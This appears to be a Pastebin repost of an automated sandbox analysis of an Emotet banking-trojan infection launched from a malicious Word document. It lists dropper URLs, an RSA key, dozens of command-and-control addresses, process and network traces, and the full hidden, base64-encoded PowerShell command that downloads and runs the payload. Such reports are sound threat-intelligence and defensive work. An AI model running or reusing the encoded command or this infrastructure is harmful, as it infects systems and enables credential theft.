Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- http://clean.olexandry.ru/cgi-bin/bypunp4pe9lku0h_cdjc_mdWawE_R7kN9jO/uykzspnv035o_hbf_space/261427075951_vpoPhvKwo3g2oPB/
- windows10_x64
- http://clean.olexandry.ru/cgi-bin/bypunp4pe9lku0h_cdjc_mdWawE_R7kN9jO/uykzspnv035o_hbf_space/261427075951_vpoPhvKwo3g2oPB/
- 10
- MALWARE CONFIG
- SIGNATURES
- TTP Categories3
- Signatures17
- PROCESSES9
- NETWORK
- TCP
- UDP
- IGMP
- REPLAY MONITOR
- BACKEND
- horse2
- MAX TIME KERNEL
- 145s
- REPORTED
- 2020-01-15T15:04:48Z
- RESOURCE
- win10v191014
- SCORE
- 10
- SUBMITTED
- 2020-01-15T15:02:14Z
- Target
- http://clean.olexandry.ru/cgi-bin/bypunp4pe9lku0h_cdjc_mdWawE_R7kN9jO/uykzspnv035o_hbf_space/261427075951_vpoPhvKwo3g2oPB/
- Filesize
- N/A
- Completed
- 2020-01-15 17:04
- Score
- 10
- /10
- MD5
- N/A
- SHA1
- N/A
- SHA256
- N/A
- emotet evasion trojan banker
- Extracted
- Language
- ps1
- URLs
- exe.dropper
- http://fxkoppa.com/wp-admin/y2d4SsG/
- http://fxkoppa.com/wp-admin/y2d4SsG/
- exe.dropper
- http://mustuncelik.com/wp-admin/D3QY3136405/
- http://mustuncelik.com/wp-admin/D3QY3136405/
- exe.dropper
- http://www.forgefitlife.com/article/Ycan6NV2n6/
- http://www.forgefitlife.com/article/Ycan6NV2n6/
- exe.dropper
- http://fabulousladies.info/8c8c022d0dd1523db4008ba9cf0d936e/ALPLsSy7p/
- http://fabulousladies.info/8c8c022d0dd1523db4008ba9cf0d936e/ALPLsSy7p/
- exe.dropper
- http://www.tiswinetrail.com/ifjza/enLL737/
- http://www.tiswinetrail.com/ifjza/enLL737/
- Extracted
- Family
- emotet
- rsa_pubkey.plain
- -----BEGIN PUBLIC KEY-----
- MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOmlscqbEIhLjVsj9r3eYacKi6C+Qrua
- j5TlU+pn3zc0k06qCoahFXBBGnYMotHQc6OwfBKwHWm831LIVg29kEjT8UYxnN5v
- fzNGgqXTe25QARf78CsQqqN/ImKdXo+GFwIDAQAB
- -----END PUBLIC KEY-----
- C2
- 70.184.69.146:80
- 70.184.69.146:80
- 186.177.165.196:443
- 186.177.165.196:443
- 139.47.135.215:80
- 139.47.135.215:80
- 192.241.143.52:8080
- 192.241.143.52:8080
- 159.65.241.220:8080
- 159.65.241.220:8080
- 45.79.95.107:443
- 45.79.95.107:443
- 69.163.33.84:8080
- 69.163.33.84:8080
- 177.34.142.163:80
- 177.34.142.163:80
- 200.123.183.137:443
- 200.123.183.137:443
- 2.47.112.72:80
- 2.47.112.72:80
- 190.17.44.48:80
- 190.17.44.48:80
- 187.54.225.76:80
- 187.54.225.76:80
- 190.219.149.236:80
- 190.219.149.236:80
- 190.100.153.162:443
- 190.100.153.162:443
- 58.171.38.26:80
- 58.171.38.26:80
- 91.205.215.57:7080
- 91.205.215.57:7080
- 152.231.89.226:80
- 152.231.89.226:80
- 94.176.234.118:443
- 94.176.234.118:443
- 201.213.100.141:8080
- 201.213.100.141:8080
- 203.25.159.3:8080
- 203.25.159.3:8080
- 110.142.161.90:443
- 110.142.161.90:443
- 46.101.212.195:8080
- 46.101.212.195:8080
- 178.79.163.131:8080
- 178.79.163.131:8080
- 151.80.142.33:80
- 151.80.142.33:80
- 79.7.158.208:80
- 79.7.158.208:80
- 191.183.21.190:80
- 191.183.21.190:80
- 188.216.24.204:80
- 188.216.24.204:80
- 113.190.254.245:80
- 113.190.254.245:80
- 87.106.46.107:8080
- 87.106.46.107:8080
- 120.150.247.164:80
- 120.150.247.164:80
- 80.11.158.65:8080
- 80.11.158.65:8080
- 203.130.0.69:80
- 203.130.0.69:80
- 50.28.51.143:8080
- 50.28.51.143:8080
- 129.205.201.163:80
- 129.205.201.163:80
- 149.62.173.247:8080
- 149.62.173.247:8080
- 177.242.21.126:80
- 177.242.21.126:80
- 200.45.187.90:80
- 200.45.187.90:80
- 77.55.211.77:8080
- 77.55.211.77:8080
- 190.210.236.139:80
- 190.210.236.139:80
- 202.62.39.111:80
- 202.62.39.111:80
- 138.68.106.4:7080
- 138.68.106.4:7080
- 2.45.112.134:80
- 2.45.112.134:80
- 83.165.78.227:80
- 83.165.78.227:80
- 76.69.26.71:80
- 76.69.26.71:80
- 207.154.204.40:8080
- 207.154.204.40:8080
- 212.71.237.140:8080
- 212.71.237.140:8080
- 58.162.218.151:80
- 58.162.218.151:80
- 189.201.197.98:8080
- 189.201.197.98:8080
- 68.187.160.28:443
- 68.187.160.28:443
- 190.151.5.130:443
- 190.151.5.130:443
- 151.231.7.154:80
- 151.231.7.154:80
- 91.83.93.124:7080
- 91.83.93.124:7080
- 200.58.83.179:80
- 200.58.83.179:80
- 187.188.166.192:8080
- 187.188.166.192:8080
- 96.61.113.203:80
- 96.61.113.203:80
- 72.29.55.174:80
- 72.29.55.174:80
- 181.30.61.163:443
- 181.30.61.163:443
- 94.200.114.162:80
- 94.200.114.162:80
- 190.191.82.216:80
- 190.191.82.216:80
- 200.82.170.231:80
- 200.82.170.231:80
- 97.120.32.227:80
- 97.120.32.227:80
- 186.15.52.123:80
- 186.15.52.123:80
- 89.211.114.203:80
- 89.211.114.203:80
- 188.135.15.49:80
- 188.135.15.49:80
- 86.42.166.147:80
- 86.42.166.147:80
- 204.225.249.100:7080
- 204.225.249.100:7080
- 45.8.136.201:80
- 45.8.136.201:80
- 37.187.6.63:8080
- 37.187.6.63:8080
- 190.195.129.227:8090
- 190.195.129.227:8090
- 192.241.146.84:8080
- 192.241.146.84:8080
- 68.174.15.223:80
- 68.174.15.223:80
- 200.55.53.7:80
- 200.55.53.7:80
- 79.7.114.1:80
- 79.7.114.1:80
- 91.74.175.46:80
- 91.74.175.46:80
- 85.105.241.192:80
- 85.105.241.192:80
- 181.129.96.162:990
- 181.129.96.162:990
- 181.10.204.106:80
- 181.10.204.106:80
- 110.170.65.146:80
- 110.170.65.146:80
- 181.29.101.13:8080
- 181.29.101.13:8080
- 189.26.118.194:80
- 189.26.118.194:80
- 188.218.104.226:80
- 188.218.104.226:80
- 104.131.58.132:8080
- 104.131.58.132:8080
- 217.199.160.224:8080
- 217.199.160.224:8080
- 139.162.118.88:8080
- 139.162.118.88:8080
- 113.61.76.239:80
- 113.61.76.239:80
- 118.36.70.245:80
- 118.36.70.245:80
- 93.144.226.57:80
- 93.144.226.57:80
- 87.106.77.40:7080
- 87.106.77.40:7080
- 186.68.48.204:443
- 186.68.48.204:443
- 142.93.114.137:8080
- 142.93.114.137:8080
- 181.36.42.205:443
- 181.36.42.205:443
- 181.30.61.163:80
- 181.30.61.163:80
- 46.28.111.142:7080
- 46.28.111.142:7080
- 181.167.96.215:80
- 181.167.96.215:80
- 94.200.126.42:80
- 94.200.126.42:80
- 86.123.138.76:80
- 86.123.138.76:80
- 14.201.35.38:80
- 14.201.35.38:80
- 179.208.84.218:8080
- 179.208.84.218:8080
- 5.196.35.138:7080
- 5.196.35.138:7080
- 216.251.83.79:80
- 216.251.83.79:80
- 68.183.170.114:8080
- 68.183.170.114:8080
- 2.42.173.240:80
- 2.42.173.240:80
- 91.117.159.233:80
- 91.117.159.233:80
- 165.228.195.93:80
- 165.228.195.93:80
- 59.120.5.154:80
- 59.120.5.154:80
- 114.109.179.60:80
- 114.109.179.60:80
- 99.252.27.6:80
- 99.252.27.6:80
- 45.73.157.243:8080
- 45.73.157.243:8080
- 185.94.252.12:80
- 185.94.252.12:80
- 119.59.124.163:8080
- 119.59.124.163:8080
- 62.15.36.103:443
- 62.15.36.103:443
- 185.160.212.3:80
- 185.160.212.3:80
- 62.75.143.100:7080
- 62.75.143.100:7080
- 185.86.148.222:8080
- 185.86.148.222:8080
- 191.103.76.34:443
- 191.103.76.34:443
- 172.104.169.32:8080
- 172.104.169.32:8080
- 181.231.220.232:80
- 181.231.220.232:80
- 82.196.15.205:8080
- 82.196.15.205:8080
- 81.16.1.45:80
- 81.16.1.45:80
- 62.75.160.178:8080
- 62.75.160.178:8080
- 109.169.86.13:8080
- 109.169.86.13:8080
- 81.213.78.151:443
- 81.213.78.151:443
- 189.19.81.181:443
- 189.19.81.181:443
- 190.186.164.23:80
- 190.186.164.23:80
- 185.160.229.26:80
- 185.160.229.26:80
- 68.183.190.199:8080
- 68.183.190.199:8080
- 190.210.184.138:995
- 190.210.184.138:995
- Discovery
- Defense Evasion
- Emotet
- Process spawned unexpected child process
- WINWORD.EXE
- Powershell.exe
- Executes dropped EXE
- 475.exe
- 475.exe
- nonspecial.exe
- nonspecial.exe
- Checks whether UAC is enabled
- iexplore.exe
- IEXPLORE.EXE
- Drops file in System32 directory
- nonspecial.exe
- 475.exe
- Suspicious use of WriteProcessMemory
- iexplore.exe
- WINWORD.EXE
- Powershell.exe
- 475.exe
- nonspecial.exe
- Suspicious behavior: EmotetMutantsSpam
- 475.exe
- nonspecial.exe
- Modifies registry class
- WINWORD.EXE
- iexplore.exe
- Suspicious use of SetWindowsHookEx
- iexplore.exe
- IEXPLORE.EXE
- WINWORD.EXE
- WINWORD.EXE
- 475.exe
- 475.exe
- nonspecial.exe
- nonspecial.exe
- Suspicious use of FindShellTrayWindow
- iexplore.exe
- Suspicious behavior: AddClipboardFormatListener
- WINWORD.EXE
- WINWORD.EXE
- Suspicious use of AdjustPrivilegeToken
- Powershell.exe
- Suspicious behavior: EnumeratesProcesses
- Powershell.exe
- WINWORD.EXE
- nonspecial.exe
- Modifies Internet Explorer settings
- iexplore.exe
- IEXPLORE.EXE
- Checks processor information in registry
- WINWORD.EXE
- Enumerates system info in registry
- WINWORD.EXE
- NTFS ADS
- WINWORD.EXE
- C:\Program Files\Internet Explorer\iexplore.exe
- "C:\Program Files\Internet Explorer\iexplore.exe" http://clean.olexandry.ru/cgi-bin/bypunp4pe9lku0h_cdjc_mdWawE_R7kN9jO/uykzspnv035o_hbf_space/261427075951_vpoPhvKwo3g2oPB/
- PID: 4940
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
- "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\89TS8EPW\Untitled_file 6004262.doc" /o ""
- PID: 4468
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
- "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Embedding
- PID: 4392
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
- "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4940 CREDAT:82945 /prefetch:2
- PID: 4988
- C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
- Powershell -w hidden -en JABKAGsAcgBvAHIAcABxAHoAZQBlAGcAPQAnAFEAdwBqAGMAeABuAHUAawBuAHcAJwA7ACQAUgBvAGEAZwBxAHYAYwB5AGcAIAA9ACAAJwA0ADcANQAnADsAJABXAGMAcQBlAHoAdwBuAHgAPQAnAEsAdABxAHAAcwBmAHUAYwBsAHUAcABwAHQAJwA7ACQATAB0AGkAYgBpAGkAZQBpAGYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFIAbwBhAGcAcQB2AGMAeQBnACsAJwAuAGUAeABlACcAOwAkAEIAcwB4AGQAdwBuAGYAZwA9ACcATwBqAGEAZQBqAGcAbgBnAHgAegBpAGcAJwA7ACQAVgBuAHYAawBzAHMAagBsAGwAPQAmACgAJwBuAGUAdwAnACsAJwAtAG8AJwArACcAYgBqAGUAJwArACcAYwB0ACcAKQAgAE4AZQBUAC4AdwBlAGIAYwBMAEkARQBOAHQAOwAkAFoAdgBrAGYAbABrAGYAcwBkAHEAPQAnAGgAdAB0AHAAOgAvAC8AZgB4AGsAbwBwAHAAYQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AeQAyAGQANABTAHMARwAvACoAaAB0AHQAcAA6AC8ALwBtAHUAcwB0AHUAbgBjAGUAbABpAGsALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAEQAMwBRAFkAMwAxADMANgA0ADAANQAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGYAbwByAGcAZQBmAGkAdABsAGkAZgBlAC4AYwBvAG0ALwBhAHIAdABpAGMAbABlAC8AWQBjAGEAbgA2AE4AVgAyAG4ANgAvACoAaAB0AHQAcAA6AC8ALwBmAGEAYgB1AGwAbwB1AHMAbABhAGQAaQBlAHMALgBpAG4AZgBvAC8AOABjADgAYwAwADIAMgBkADAAZABkADEANQAyADMAZABiADQAMAAwADgAYgBhADkAYwBmADAAZAA5ADMANgBlAC8AQQBMAFAATABzAFMAeQA3AHAALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgB0AGkAcwB3AGkAbgBlAHQAcgBhAGkAbAAuAGMAbwBtAC8AaQBmAGoAegBhAC8AZQBuAEwATAA3ADMANwAvACcALgAiAHMAcABMAGAASQBUACIAKAAnACoAJwApADsAJABFAHMAdQBiAG4AbABoAGkAPQAnAFkAZQBxAHQAbwBsAGUAbgAnADsAZgBvAHIAZQBhAGMAaAAoACQARQB2AGIAYwB0AGwAaAB5ACAAaQBuACAAJABaAHYAawBmAGwAawBmAHMAZABxACkAewB0AHIAeQB7ACQAVgBuAHYAawBzAHMAagBsAGwALgAiAEQAYABvAHcAYABOAGwATwBBAGAARABmAEkAbABlACIAKAAkAEUAdgBiAGMAdABsAGgAeQAsACAAJABMAHQAaQBiAGkAaQBlAGkAZgApADsAJABFAHcAdQB5AGIAbgBjAGoAdgBtAHMAdgB0AD0AJwBEAHMAZQBzAGUAbABmAGYAdwBnAGYAcAB0ACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQATAB0AGkAYgBpAGkAZQBpAGYAKQAuACIAbABlAGAATgBHAHQAaAAiACAALQBnAGUAIAAzADMAOQAxADcAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AEEAYABSAHQAIgAoACQATAB0AGkAYgBpAGkAZQBpAGYAKQA7ACQAVQBmAGMAeQBpAHkAdwBhAGEAagB5AG0APQAnAEQAawB2AHYAawB0AGEAdQB3AGsAJwA7AGIAcgBlAGEAawA7ACQAWAByAHYAeABpAHIAagByAHgAcAByAD0AJwBFAHcAZQBzAHUAbgBzAG4AawBjAHYAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASABzAHUAYQBpAHMAegBzAGEAZQBlAGMAYQA9ACcAQQBvAG4AdAB6AGcAZwB3ACcA
- PID: 4024
- C:\Users\Admin\475.exe
- "C:\Users\Admin\475.exe"
- PID: 4884
- C:\Users\Admin\475.exe
- --5fe68d50
- PID: 4832
- C:\Windows\SysWOW64\nonspecial.exe
- "C:\Windows\SysWOW64\nonspecial.exe"
- PID: 3532
- C:\Windows\SysWOW64\nonspecial.exe
- --3376419e
- PID: 3528
- GET
- 200
- 91.219.194.22:80
- http://clean.olexandry.ru/cgi-bin/bypunp4pe9lku0h_cdjc_mdWawE_R7kN9jO/uykzspnv035o_hbf_space/261427075951_vpoPhvKwo3g2oPB/
- IEXPLORE.EXE
- 91.219.194.22:80
- clean.olexandry.ru
- IEXPLORE.EXE
- 117.18.232.200:443
- iecvlist.microsoft.com
- GET
- 200
- 93.184.221.240:80
- http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?3859bad904928548
- GET
- 200
- 93.184.220.29:80
- http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D
- 117.18.232.200:443
- iecvlist.microsoft.com
- 52.109.76.6:443
- officeclient.microsoft.com
- 52.109.124.24:443
- nexus.officeapps.live.com
- 52.109.88.36:443
- nexusrules.officeapps.live.com
- 204.79.197.200:443
- ieonline.microsoft.com
- iexplore.exe
- 204.79.197.200:443
- ieonline.microsoft.com
- iexplore.exe
- 66.219.22.235:80
- fxkoppa.com
- Powershell.exe
- 127.0.0.1:47001
- 104.81.140.70:443
- fs.microsoft.com
- 93.184.221.240:80
- ctldl.windowsupdate.com
- 104.81.140.70:443
- fs.microsoft.com
- 104.81.140.70:443
- fs.microsoft.com
- 104.81.140.70:443
- fs.microsoft.com
- 52.109.76.6:443
- officeclient.microsoft.com
- WINWORD.EXE
- 52.109.12.24:443
- nexus.officeapps.live.com
- WINWORD.EXE
- 70.184.69.146:80
- nonspecial.exe
- 52.109.88.36:443
- nexusrules.officeapps.live.com
- WINWORD.EXE
- 186.177.165.196:443
- nonspecial.exe
- © Hatching B.V. 2019
Add Comment
Please, Sign In to add comment